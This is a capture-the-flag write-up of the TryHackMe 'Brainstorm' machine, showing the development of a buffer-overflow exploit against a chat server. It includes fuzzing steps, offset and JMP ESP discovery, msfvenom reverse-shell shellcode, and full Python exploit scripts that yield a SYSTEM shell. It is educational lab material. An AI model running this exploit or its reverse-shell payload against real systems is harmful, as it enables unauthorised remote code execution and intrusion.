Brainstorm: Buffer Overflow
This is a write-up of the TryHackMe machine Brainstorm featuring a buffer overflow.
Enumeration
The usual Nmap scan comes back saying the host is down, let’s use the following command to scan the host assuming it is up:
Kali> nmap -Pn 10.10.166.128
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 11:13 EDT
Nmap scan report for 10.10.166.128
Host is up (0.22s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
3389/tcp open ms-wbt-server
9999/tcp open abyssNmap done: 1 IP address (1 host up) scanned in 15.55 seconds
FTP
Here we see that we have FTP, remote desktop on 3389, and something called abyss running on port 9999. Lets first check out the FTP service.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.166.128
Connected to 10.10.166.128.
220 Microsoft FTP Service
Name (10.10.166.128:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19 08:36PM <DIR> chatserver
226 Transfer complete.
ftp> cd chatserver
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-29-19 10:26PM 43747 chatserver.exe
08-29-19 10:27PM 30761 essfunc.dll
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget chatserver.exe
mget chatserver.exe?
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
43747 bytes received in 1.17 secs (36.5044 kB/s)
ftp> mget essfunc.dll
mget essfunc.dll?
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
30761 bytes received in 0.87 secs (34.4512 kB/s)
ftp>We can login anonymously using the username anonymous and a blank password. Next we see that we have two files in the chatserver directory, chatserver.exe and essfunc.dll and we download them using the mget command.
Abyss: Port 9999
Next, let’s look into the mysterious abyss service running on port 9999. We can do this by simply connecting to the port using Netcat.
┌──(kali㉿kali)-[~]
└─$ nc -nv 10.10.166.128 9999
(UNKNOWN) [10.10.166.128] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): zexpher
Write a message: helloThu Nov 04 08:27:45 2021
zexpher said: helloWrite a message:
This appears to be that chatserver.exe program we encountered in our FTP enumeration. Just interacting with the service we see that there is a maximum number of characters for the username which might give us a potential buffer overflow opportunity.
Chaterserver and Immunity Debugger
We will use the immunity debugger to open up the downloaded chatserver application to gain a better understanding of how the application works. Immunity debugger can be downloaded for free from here.
Note: We will need to debug this application on Windows 7, if you do not have a copy of windows 7 you can download a virtual image here.
Once you have all of that downloaded and installed on your Windows 7 virtual machine we can open immunity by running it as administrator. Next we will connect the chatserver.exe app using the file icon in the upper left menu bar.
Click open and the application will be started in a paused state. To run the application click the red play button.
Now that immunity is running in our VM with the chatserver.exe attached, we can connect to the service and begin to fuzz the application.
Fuzzing
Firstly, we want to generate a large string of characters to pass to the application. We can do this simply using python.
┌──(kali㉿kali)-[~/Documents/brainstorm]
└─$ python -c 'print "A" * 5000'This command will print 5000 A characters that we can copy to our clipboard then pass onto the application. Once again we will connect to the service using netcat, only this time we will use the IP address of the local VM where we are running immunity debugger.
┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.5.128 9999 1 ⚙
(UNKNOWN) [192.168.5.128] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...This large string does not crash the program, and If we look at the chatserver window we see that only about 20 characters pass onto the server.
This means that the username field is not susceptible to a buffer overflow. Next, let’s try the message field with the same large string of A’s.
We see that we got an access violation after passing the string of A’s through the message field. Now we have found a vulnerable part of the application that we can form our attack around.
Finding the Offset
We need to find the offset of where the A’s reach the EIP so that we can control where the program points its instructions. We can do this by generation a set of cyclical values using Metasploit.
┌──(kali㉿kali)-[~]
└─$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac...We send this string of cyclical values the same way as we sent the string of A’s. Remember to restart the immunity debugger and attach the chatserver.exe program as we did before.
┌──(kali㉿kali)-[~/Documents/brainstorm]
└─$ nc -nv 192.168.5.128 9999 1 ⨯
(UNKNOWN) [192.168.5.128] 9999 (?) open
Welcome to Brainstorm chat (beta)
Please enter your username (max 20 characters): zexpher
Write a message: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4...Now looking at the immunity debugger we see we have cyclical values in the EIP register.
Copy what is in the register and pass it to patter_offset.rb to find the offset.
┌──(kali㉿kali)-[~]
└─$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 5000 -q 31704330
[*] Exact match at offset 2012Great, our offset value is 2012!
Controlling the EIP
Now we may begin building our exploit with python. The following python script connects to the webserver and sends the username, then sends our message with the offset of 2012 then 4 B’s. This should leave us with the four B’s in the EIP register.
import socket
import sysusername = b"zexpher"
message = b"A" * 2012 + b"B" * 4
try:
print("Sending payload....")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.5.128',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
Running the python script then looking at the debugger we see that we have control over the EIP as it is overwritten with our four B characters.
Finding Bad Characters
Bad characters like the null byte (\x00) are any character that will break our shellcode. To find bad characters we will simply send every possible character to the program and see which ones are shown in the memory dump correctly. This list of characters can be found here. We will add this to our python script.
import socket
import sysusername = b"max"
message = b"A" * 2012 + b"B" * 4
badchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)try:
print("Sending payload....")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.5.128',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + badchars + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
Run this script then follow the ESP in the memory dump by right clicking and selecting follow in dump.
Here we can see that none of the characters sent over were corrupted, therefore the only bad character is the null byte (\x00).
Finding the right Module & JMP Point
In our exploit we want to find a point in the program in which we can set the EIP to jump to our shellcode. We do this by finding a jmp esp command in the program that we can point our EIP to. Using the mona python command in immunity debugger makes this easy.
Firstly, we need to run the command !mona modules in the text box at the bottom of immunity:
We are looking for a module that does not has ASLR or any other type of memory protection process. Simply put we are looking for a module that has all false statements in the previous command. We see we have one, the program itself, and the essfunc.dll that we downloaded alongside it. We will be using the essfunc.dll today.
Next we use the command !mona find -s "\xff\xe4" -m essfunc.dll to find the JMP ESP point that is in the module without memory protection. \xff\xe4 means JMP ESP and the m flag is set to our module without memory protections.
Under results, we will choose the first address and copy it to our clipboard by right-clicking and selecting copy to clipboard > address. We will use this address in place of the four B characters that had previously overwritten the EIP.
import socket
import sys
username = b"max"
message = b"A" * 2012 + b"\xdf\x14\x50\x62"try:
print("Sending payload....")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.5.128',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
Notice how we input the address. The address is written backwards with \x between each byte.
Generating shellcode
We use msfvenom to generate our shellcode with the following command:
┌──(kali㉿kali)-[~/Documents/brainstorm]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.129 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xd9\xc1\xbd\x1a\xec\x61\xbc\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x52\x31\x6e\x17\x83\xc6\x04\x03\x74\xff\x83\x49\x74\x17\xc1"
"\xb2\x84\xe8\xa6\x3b\x61\xd9\xe6\x58\xe2\x4a\xd7\x2b\xa6\x66"
"\x9c\x7e\x52\xfc\xd0\x56\x55\xb5\x5f\x81\x58\x46\xf3\xf1\xfb"
"\xc4\x0e\x26\xdb\xf5\xc0\x3b\x1a\x31\x3c\xb1\x4e\xea\x4a\x64"
"\x7e\x9f\x07\xb5\xf5\xd3\x86\xbd\xea\xa4\xa9\xec\xbd\xbf\xf3"
"\x2e\x3c\x13\x88\x66\x26\x70\xb5\x31\xdd\x42\x41\xc0\x37\x9b"
"\xaa\x6f\x76\x13\x59\x71\xbf\x94\x82\x04\xc9\xe6\x3f\x1f\x0e"
"\x94\x9b\xaa\x94\x3e\x6f\x0c\x70\xbe\xbc\xcb\xf3\xcc\x09\x9f"
"\x5b\xd1\x8c\x4c\xd0\xed\x05\x73\x36\x64\x5d\x50\x92\x2c\x05"
"\xf9\x83\x88\xe8\x06\xd3\x72\x54\xa3\x98\x9f\x81\xde\xc3\xf7"
"\x66\xd3\xfb\x07\xe1\x64\x88\x35\xae\xde\x06\x76\x27\xf9\xd1"
"\x79\x12\xbd\x4d\x84\x9d\xbe\x44\x43\xc9\xee\xfe\x62\x72\x65"
"\xfe\x8b\xa7\x2a\xae\x23\x18\x8b\x1e\x84\xc8\x63\x74\x0b\x36"
"\x93\x77\xc1\x5f\x3e\x82\x82\x9f\x17\x89\xd3\x48\x6a\x91\xc2"
"\xd4\xe3\x77\x8e\xf4\xa5\x20\x27\x6c\xec\xba\xd6\x71\x3a\xc7"
"\xd9\xfa\xc9\x38\x97\x0a\xa7\x2a\x40\xfb\xf2\x10\xc7\x04\x29"
"\x3c\x8b\x97\xb6\xbc\xc2\x8b\x60\xeb\x83\x7a\x79\x79\x3e\x24"
"\xd3\x9f\xc3\xb0\x1c\x1b\x18\x01\xa2\xa2\xed\x3d\x80\xb4\x2b"
"\xbd\x8c\xe0\xe3\xe8\x5a\x5e\x42\x43\x2d\x08\x1c\x38\xe7\xdc"
"\xd9\x72\x38\x9a\xe5\x5e\xce\x42\x57\x37\x97\x7d\x58\xdf\x1f"
"\x06\x84\x7f\xdf\xdd\x0c\x9f\x02\xf7\x78\x08\x9b\x92\xc0\x55"
"\x1c\x49\x06\x60\x9f\x7b\xf7\x97\xbf\x0e\xf2\xdc\x07\xe3\x8e"
"\x4d\xe2\x03\x3c\x6d\x27";Now copy that shellcode in place of your bad characters in your python script like so:
import socket
import sysusername = b"max"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xd9\xc1\xbd\x1a\xec\x61\xbc\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
b"\x52\x31\x6e\x17\x83\xc6\x04\x03\x74\xff\x83\x49\x74\x17\xc1"
b"\xb2\x84\xe8\xa6\x3b\x61\xd9\xe6\x58\xe2\x4a\xd7\x2b\xa6\x66"
b"\x9c\x7e\x52\xfc\xd0\x56\x55\xb5\x5f\x81\x58\x46\xf3\xf1\xfb"
b"\xc4\x0e\x26\xdb\xf5\xc0\x3b\x1a\x31\x3c\xb1\x4e\xea\x4a\x64"
b"\x7e\x9f\x07\xb5\xf5\xd3\x86\xbd\xea\xa4\xa9\xec\xbd\xbf\xf3"
b"\x2e\x3c\x13\x88\x66\x26\x70\xb5\x31\xdd\x42\x41\xc0\x37\x9b"
b"\xaa\x6f\x76\x13\x59\x71\xbf\x94\x82\x04\xc9\xe6\x3f\x1f\x0e"
b"\x94\x9b\xaa\x94\x3e\x6f\x0c\x70\xbe\xbc\xcb\xf3\xcc\x09\x9f"
b"\x5b\xd1\x8c\x4c\xd0\xed\x05\x73\x36\x64\x5d\x50\x92\x2c\x05"
b"\xf9\x83\x88\xe8\x06\xd3\x72\x54\xa3\x98\x9f\x81\xde\xc3\xf7"
b"\x66\xd3\xfb\x07\xe1\x64\x88\x35\xae\xde\x06\x76\x27\xf9\xd1"
b"\x79\x12\xbd\x4d\x84\x9d\xbe\x44\x43\xc9\xee\xfe\x62\x72\x65"
b"\xfe\x8b\xa7\x2a\xae\x23\x18\x8b\x1e\x84\xc8\x63\x74\x0b\x36"
b"\x93\x77\xc1\x5f\x3e\x82\x82\x9f\x17\x89\xd3\x48\x6a\x91\xc2"
b"\xd4\xe3\x77\x8e\xf4\xa5\x20\x27\x6c\xec\xba\xd6\x71\x3a\xc7"
b"\xd9\xfa\xc9\x38\x97\x0a\xa7\x2a\x40\xfb\xf2\x10\xc7\x04\x29"
b"\x3c\x8b\x97\xb6\xbc\xc2\x8b\x60\xeb\x83\x7a\x79\x79\x3e\x24"
b"\xd3\x9f\xc3\xb0\x1c\x1b\x18\x01\xa2\xa2\xed\x3d\x80\xb4\x2b"
b"\xbd\x8c\xe0\xe3\xe8\x5a\x5e\x42\x43\x2d\x08\x1c\x38\xe7\xdc"
b"\xd9\x72\x38\x9a\xe5\x5e\xce\x42\x57\x37\x97\x7d\x58\xdf\x1f"
b"\x06\x84\x7f\xdf\xdd\x0c\x9f\x02\xf7\x78\x08\x9b\x92\xc0\x55"
b"\x1c\x49\x06\x60\x9f\x7b\xf7\x97\xbf\x0e\xf2\xdc\x07\xe3\x8e"
b"\x4d\xe2\x03\x3c\x6d\x27")
try:
print("Sending payload....")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.5.128',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
Gaining a shell
Finally, we set up a netcat listener on port 4444 that we specified in the shellcode generation, then run the python script!
We have successfully created our exploit and got a shell! All that is left is to update the exploit with the target IP address of the brainstorm machine and generate new payload for the correct listener address.
Shell on Brainstorm
import socket
import sysusername = b"max"
message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32
payload = (b"\xb8\x8f\x22\x04\x43\xdb\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
b"\x52\x31\x43\x12\x83\xeb\xfc\x03\xcc\x2c\xe6\xb6\x2e\xd8\x64"
b"\x38\xce\x19\x09\xb0\x2b\x28\x09\xa6\x38\x1b\xb9\xac\x6c\x90"
b"\x32\xe0\x84\x23\x36\x2d\xab\x84\xfd\x0b\x82\x15\xad\x68\x85"
b"\x95\xac\xbc\x65\xa7\x7e\xb1\x64\xe0\x63\x38\x34\xb9\xe8\xef"
b"\xa8\xce\xa5\x33\x43\x9c\x28\x34\xb0\x55\x4a\x15\x67\xed\x15"
b"\xb5\x86\x22\x2e\xfc\x90\x27\x0b\xb6\x2b\x93\xe7\x49\xfd\xed"
b"\x08\xe5\xc0\xc1\xfa\xf7\x05\xe5\xe4\x8d\x7f\x15\x98\x95\x44"
b"\x67\x46\x13\x5e\xcf\x0d\x83\xba\xf1\xc2\x52\x49\xfd\xaf\x11"
b"\x15\xe2\x2e\xf5\x2e\x1e\xba\xf8\xe0\x96\xf8\xde\x24\xf2\x5b"
b"\x7e\x7d\x5e\x0d\x7f\x9d\x01\xf2\x25\xd6\xac\xe7\x57\xb5\xb8"
b"\xc4\x55\x45\x39\x43\xed\x36\x0b\xcc\x45\xd0\x27\x85\x43\x27"
b"\x47\xbc\x34\xb7\xb6\x3f\x45\x9e\x7c\x6b\x15\x88\x55\x14\xfe"
b"\x48\x59\xc1\x51\x18\xf5\xba\x11\xc8\xb5\x6a\xfa\x02\x3a\x54"
b"\x1a\x2d\x90\xfd\xb1\xd4\x73\x08\x44\x8e\x06\x64\x4a\x2e\x18"
b"\x29\xc3\xc8\x70\xc1\x85\x43\xed\x78\x8c\x1f\x8c\x85\x1a\x5a"
b"\x8e\x0e\xa9\x9b\x41\xe7\xc4\x8f\x36\x07\x93\xed\x91\x18\x09"
b"\x99\x7e\x8a\xd6\x59\x08\xb7\x40\x0e\x5d\x09\x99\xda\x73\x30"
b"\x33\xf8\x89\xa4\x7c\xb8\x55\x15\x82\x41\x1b\x21\xa0\x51\xe5"
b"\xaa\xec\x05\xb9\xfc\xba\xf3\x7f\x57\x0d\xad\x29\x04\xc7\x39"
b"\xaf\x66\xd8\x3f\xb0\xa2\xae\xdf\x01\x1b\xf7\xe0\xae\xcb\xff"
b"\x99\xd2\x6b\xff\x70\x57\x8b\xe2\x50\xa2\x24\xbb\x31\x0f\x29"
b"\x3c\xec\x4c\x54\xbf\x04\x2d\xa3\xdf\x6d\x28\xef\x67\x9e\x40"
b"\x60\x02\xa0\xf7\x81\x07")try:
print("Sending payload....")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.88.12',9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\r\n')
s.recv(1024)
s.send(message + payload + b'\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
Setting up our listener again, and running the exploit we gain a shell!
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444 1 ⨯ 1 ⚙
listening on [any] 4444 ...
connect to [10.2.88.133] from (UNKNOWN) [10.10.88.12] 49174
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoami
whoami
nt authority\systemC:\Windows\system32>cd \Users
cd \UsersC:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040Directory of C:\Users08/29/2019 10:20 PM <DIR> .
08/29/2019 10:20 PM <DIR> ..
08/29/2019 10:21 PM <DIR> drake
11/21/2010 12:16 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 19,708,940,288 bytes freeC:\Users>cd drake
cd drakeC:\Users\drake>cd Desktop
cd DesktopC:\Users\drake\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040Directory of C:\Users\drake\Desktop08/29/2019 10:55 PM <DIR> .
08/29/2019 10:55 PM <DIR> ..
08/29/2019 10:55 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 19,703,132,160 bytes freeC:\Users\drake\Desktop>
We successfully crafted an exploit and got root on the system. Capture that flag!
Thank you for following along and happy hacking!
